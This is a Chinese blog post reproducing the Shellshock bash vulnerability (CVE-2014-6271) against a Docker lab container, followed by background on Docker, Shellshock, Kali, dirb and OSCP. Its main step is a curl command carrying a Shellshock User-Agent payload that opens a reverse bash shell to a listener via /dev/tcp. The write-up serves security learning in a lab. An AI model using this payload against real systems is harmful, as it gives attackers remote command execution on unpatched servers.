CVE-2014-6271漏洞复现

已于 2023-11-07 13:54:33 修改
阅读量3k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2020-01-16 15:15:36 首次发布
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/104005219
版权

0x00 前言

要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现

0x01 正文

这里直接使用别人弄好的docker,简单又方便

docker pull hmlio/vaas-cve-2014-6271

下载完成之后,开启docker

docker run -d -p 80:80 hmlio/vaas-cve-2014-6271

访问目标页面
在这里插入图片描述
这里还需要知道一个路径,直接dirb
在这里插入图片描述
这里接着对cgi-bin进行一个爆破
在这里插入图片描述
最后拿到目标
执行payload:
curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.25.165/2333 0<&1 2>&1” http://192.168.25.178/cgi-bin/stats

这里不使用msf因为oscp 规定msf只能使用一次来着(我隐约记得)

kali监听就行
在这里插入图片描述

补充知识

docker

Docker是一个开源的应用程序容器引擎,它可以将应用程序打包成一个容器,然后轻松地在任何地方部署,不受运行环境的限制,同时也保证了应用程序在不同平台之间的一致性。Docker允许开发人员在容器中封装应用程序和依赖库,从而消除了环境差异所带来的问题,并提供了一种快速、可靠且一致的方法来构建、部署和运行应用程序。Docker也有一些基于容器的服务,如Docker Compose、Docker Swarm和Kubernetes,可以帮助开发人员和运维人员更好地管理和部署容器。

shellshock

ShellShock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。

ShellShock漏洞的原理是,因为Bash在解析环境变量时存在漏洞,攻击者可以通过设置环境变量来执行任意代码。具体来说,Bash在解析环境变量时会将变量中的内容作为命令来执行,如果变量中的内容包含了恶意的命令,就会导致攻击者可以执行任意代码。

为了防范ShellShock漏洞,建议用户及时更新Bash版本,并避免在非必要情况下使用Bash来执行命令。同时,管理员也应该对服务器进行安全配置,限制对Bash的访问权限,避免攻击者利用ShellShock漏洞进行攻击。

shellshock危害

ShellShock漏洞的危害包括:

攻击者可以通过该漏洞执行任意代码,获取服务器控制权,甚至进行拒绝服务攻击。
ShellShock漏洞容易受到攻击,攻击者可以利用该漏洞获取私人信息,如密码文件等。
ShellShock漏洞的存在使得攻击者可以轻松地通过注入代码来攻击服务器,从而对互联网结构造成威胁。

因此,ShellShock漏洞的危害性非常大,需要用户及时更新Bash版本,并采取相应的安全措施来防范攻击。

kali

Kali Linux是一款由Offensive Security团队开发的基于Debian Linux的操作系统,旨在提供给安全专业人员进行渗透测试、安全审计和漏洞评估等常见任务所需的工具和环境。Kali Linux集成了众多的安全测试工具,包括Nmap、Metasploit等常用的渗透测试工具,以及Wireshark、Aircrack-ng等网络安全工具。其特点是易于使用、自由和开放源代码,因此广泛应用于安全行业,成为了当下领先的安全测试操作系统。

dirb

Dirb是一个基于字典的Web目录扫描工具,它可以探测Web服务器上隐藏的文件和目录。它通过使用常见的字典列表来查找网站的目录和文件,并执行类似的任务,如对目录的控制、暴力攻击等。Dirb可以用于探测网站上的隐藏文件和目录,并在这些目录中搜索敏感文件。它也可以用于检查Web服务器对目录的权限的限制情况。此外,它还提供了自定义字典的功能,可以使用用户自定义的字典列表进行扫描,以找到更多的目录和文件。

其他目录扫描工具

除了DirBuster,还有许多其他的目录扫描工具可供选择。以下是一些类似DirBuster的目录扫描工具:

Dirsearch:一个用Python编写的暴力扫描工具,用于查找隐藏的Web目录和文件。它可以在Web服务器上扫描指定目录,并尝试通过字典攻击来获取敏感文件。
Webdirscan:一个简单的多线程Web目录扫描工具,使用Python语言编写,主要调用了requests第三方库实现。它能够快速扫描Web服务器上的目录结构,并尝试获取敏感文件。
Gobuster:一个开源工具,主要用于网站目录扫描和子域名收集。它可以通过字典攻击或暴力破解方式来扫描目标网站的目录结构,并尝试获取敏感文件或子域名。

这些工具都可以帮助攻击者或安全研究人员扫描Web服务器的目录结构,并尝试获取敏感文件或信息。然而,请确保在使用这些工具时遵守法律法规和道德准则,仅在授权范围内进行操作。

OSCP

OSCP(Offensive Security Certified Professional)是一种计算机安全认证,由Offensive Security公司创建并维护。该认证涵盖了网络渗透测试和信息安全技术的广泛知识,并旨在测试个人的技能和能力,以便在实际情况下进行网络渗透测试。

通过OSCP认证,个人可以证明他们已经具备了以下技能和能力:

  • 渗透测试知识和技术
  • 端口扫描和服务识别
  • 漏洞扫描和利用
  • 密码破解和渗透测试后的维护
  • 物理和社会工程学攻击

认证考试需要参加一个24小时的渗透测试实验,个人需要在规定时间内寻找到网络中的5个目标及其相关信息。考试难度很高,因此前置连续成功完成两次主题为“渗透测试与无线渗透测试”的Offensive Security课程是强烈建议的。

王嘟嘟_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9108
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
Bash Shellshock CVE-2014-6271 漏洞复现
weixin_43144118的博客
11-11 382
Bash Shellshock CVE-2014-6271 漏洞复现 Bash介绍 Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实现,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。 根据维基百科的描述:Bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU...
Bash Bug(破壳漏洞,Shellshock) - CVE-2014-6271
HaSaKing的博客
05-28 509
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
vulhub漏洞复现之bash(Shellshock CVE-2014-6271
weixin_43071873的博客
11-27 1248
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
cve-2014-6271 复现
PDblue的博客
04-12 1739
CVE-2014-6271,主要存在于 bash 1.14 - 4.3 版本中,受影响的 linux 系统包括:Red Hat 企业 Linux (versions 4 ~7) 、Fedora distribution、CentOS (versions 5 ~7)、Ubuntu 10.04 LTS,12.04 LTS 和 14.04 LTS、Debian 等。 使用vulhub搭建漏洞环境 访...
破壳漏洞(ShellShock)-编号CVE-2014-6271-修复
iteye_5816的博客
10-08 806
2014年9月24日,Bash暴露严重安全漏洞,编号为CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。CNVD对破壳漏洞(ShellShock)的严重性定义为10级(最高)。 一、漏洞信息 1、漏洞描述 GNU Bash 是一个为GNU 计划编写的Unix Shell,广泛使用在Linux 系统内。破壳漏洞(ShellShock)将导致攻击者可改变或绕过...
Shellshock破壳突破(CVE-2014-6271复现
willow_liang的博客
04-15 344
1.使用vluhub的环境进行复现 docker-compose build docker-compose up -d docker ps 环境生成后会有两个页面。http://192.168.0.105:8080/victim.cgi 和 http://192.168.0.105:8080/safe.cgi 其中safe.cgi是最新版bash生成的页面,viceim.cgi是bash4.3生成的页面,使用payload访问victim.cgi User-Agent: () { foo; };
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Bash Shellshock CVE-2014-6271(破壳)
Hydra的博客
10-21 3745
Shell shell是一个程序,可以称为壳程序,用于用户与操作系统进行交互。 Shell 既是一种命令语言,又是一种程序设计语言。 Shell有很多中,这里列出其中几种 - Bourne SHell(sh) - Bourne Again SHell(bash) - C SHell(csh) - KornSHell(ksh) - zsh 运行shell脚本有两种办法: 1.作为可执行程序...
bash漏洞修补, CVE-2014-6271
weixin_34257076的博客
10-31 363
转自阿里云:http://bbs.aliyun.com/read/176975.html?spm=5176.7189909.0.0.f9BXkiBash紧急漏洞,请所有正在使用linux服务器的用户注意。该漏洞直接影响基于 Unix 的系统(如Linux、OS X 等),可导致远程***者在受影响的系统上执行任意代码。【已确认被成功利用的软件及系统】所有安装gun ...
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3017
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
【web攻防】破壳漏洞CVE-2014-6271】与心脏滴血漏洞CVE-2014-0160】 docker 复现 学习过程
AAAAAAAAAAAA66的博客
03-18 6098
其实最近的确是想更新一些文章的,但一直在忙于挖洞和挖洞技巧学习,前者肯定不能发真实案例,后者学的太零碎太杂,自己也处于一个积累的过程,发一些边边角角的内容也没意思。 虽然相比以前的确有了一点进步,但我仍然处于一个很差的水平,还是得慢慢积累。当然,做什么事都必须要抓重点,以后着重复现这种危害大,范围广的漏洞。 破壳漏洞CVE-2014-6271】 具体分析 ShellShock(破壳漏洞)的简单分析_爱唠叨的老鱼的博客-CSDN博客_shellshock 说人话就是...
CVE-2014-6271破壳(shellshock)漏洞复现记录
dengzhasong7076的博客
07-05 533
docker大法好 搭建环境: centos 6.6 x64 docker安装 看网上说docker需要内核3.8以上,而且只能运行在64位系统 centos 6.6内核低了一点,升级一下内核。 内核升级 a、升级内核 cd /etc/yum.repos.d wget http://www.hop5.in/yum/el6/hop5.repo yum install kernel-ml-a...
CVE-2014-6271“破壳”漏洞
姚远OracleACE的博客
01-22 672
文章目录简介检测解决办法 简介 CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。 该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSS...
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值